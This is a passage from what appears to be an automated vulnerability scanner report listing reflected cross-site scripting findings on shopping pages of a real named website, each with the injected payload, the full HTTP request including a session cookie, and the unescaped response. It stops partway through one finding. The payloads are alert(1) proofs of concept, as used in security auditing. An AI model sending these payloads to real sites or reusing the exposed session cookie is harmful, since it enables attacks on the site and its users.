Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:16:35 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping3edbc'-alert(1)-'89c35d638a0/Clothing-Accessories/194367784/Jewelry/23';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.831. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Jewelry/23 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Jewelry/23

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4bb7"><a>d9b30da8cf1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppingf4bb7"><a>d9b30da8cf1/Clothing-Accessories/194367784/Jewelry/23 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:05:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppingf4bb7"><a>d9b30da8cf1">
...[SNIP]...

4.832. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Jewelry/23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Jewelry/23

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4f37e<script>alert(1)</script>cb989f0910 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Clothing-Accessories4f37e<script>alert(1)</script>cb989f0910/194367784/Jewelry/23 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:22:37 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Clothing Accessories4f37e<script>alert(1)</script>cb989f0910 <a href="#" id="backlink">
...[SNIP]...

4.833. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Jewelry/23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Jewelry/23

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8c49'-alert(1)-'15c2a5e3ae1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessoriesb8c49'-alert(1)-'15c2a5e3ae1/194367784/Jewelry/23 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:22:28 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessoriesb8c49'-alert(1)-'15c2a5e3ae1/194367784/Jewelry/23';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.834. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Jewelry/23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Jewelry/23

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27413'-alert(1)-'877165897ff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/19436778427413'-alert(1)-'877165897ff/Jewelry/23 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:27:39 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessories/19436778427413'-alert(1)-'877165897ff/Jewelry/23';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.835. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Jewelry/23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Jewelry/23

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff1f7'-alert(1)-'cf8a11d79b5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784/Jewelryff1f7'-alert(1)-'cf8a11d79b5/23 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:33:10 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Clothing-Accessories/194367784/Jewelryff1f7'-alert(1)-'cf8a11d79b5/23';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.836. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Jewelry/23 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Jewelry/23

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5612'-alert(1)-'0064c52d09 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784/Jewelry/23b5612'-alert(1)-'0064c52d09 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:37:58 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Clothing-Accessories/194367784/Jewelry/23b5612'-alert(1)-'0064c52d09';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.837. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Leather-Goods/76 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Leather-Goods/76

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93d1a'-alert(1)-'d39b65e67c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping93d1a'-alert(1)-'d39b65e67c4/Clothing-Accessories/194367784/Leather-Goods/76 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:05:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping93d1a'-alert(1)-'d39b65e67c4/Clothing-Accessories/194367784/Leather-Goods/76';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.838. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Leather-Goods/76 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Leather-Goods/76

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9951"><a>177064adf8d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppingd9951"><a>177064adf8d/Clothing-Accessories/194367784/Leather-Goods/76 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:55:32 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppingd9951"><a>177064adf8d">
...[SNIP]...

4.839. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Leather-Goods/76 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Leather-Goods/76

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2321'-alert(1)-'eefd3448321 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessoriesb2321'-alert(1)-'eefd3448321/194367784/Leather-Goods/76 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:10:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Clothing-Accessoriesb2321'-alert(1)-'eefd3448321/194367784/Leather-Goods/76';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.840. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Leather-Goods/76 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Leather-Goods/76

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 623d3<script>alert(1)</script>0209725161f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Clothing-Accessories623d3<script>alert(1)</script>0209725161f/194367784/Leather-Goods/76 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:10:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Clothing Accessories623d3<script>alert(1)</script>0209725161f <a href="#" id="backlink">
...[SNIP]...

4.841. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Leather-Goods/76 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Leather-Goods/76

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c70d3'-alert(1)-'947cb80fe8c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784c70d3'-alert(1)-'947cb80fe8c/Leather-Goods/76 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:14:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessories/194367784c70d3'-alert(1)-'947cb80fe8c/Leather-Goods/76';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.842. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Leather-Goods/76 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Leather-Goods/76

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50a8c'-alert(1)-'86e651e2ac4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784/Leather-Goods50a8c'-alert(1)-'86e651e2ac4/76 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:23:15 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessories/194367784/Leather-Goods50a8c'-alert(1)-'86e651e2ac4/76';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.843. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Leather-Goods/76 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Leather-Goods/76

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33884'-alert(1)-'81af099caa5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

